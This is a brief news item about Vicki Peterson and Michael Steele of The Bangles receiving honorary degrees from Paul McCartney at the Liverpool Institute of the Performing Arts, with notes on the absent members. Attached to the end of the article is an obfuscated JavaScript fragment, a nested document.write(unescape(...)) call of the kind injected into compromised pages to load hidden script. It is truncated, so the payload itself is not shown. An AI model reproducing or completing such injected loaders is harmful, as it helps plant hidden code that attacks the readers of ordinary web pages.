Two of the women from The Bangles have a date with Paul McCartney tonight. Guitarist Vicki Peterson and bassist Michael Steele will accept honorary degrees from the Liverpool Institute of the Performing Arts from McCartney himself.
McCartney co-founded the school in 1996 on the site of the school where he and George Harrison attended grammar school.
The Bangles' web site says The Bangles conducted a master class at the school in March 2003 and it was believed to be the highest-attended session the school has ever had.
The Bangles will be honored as "Companions" for their achievements in the performing arts and contributions to the school. It's the first time the school has honored an entire band, but the entire band can't be there. Drummer Debbi Peterson will not be able to attend because she's expecting a child, and singer Susanna Hoffs can't go because she's currently a mum.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
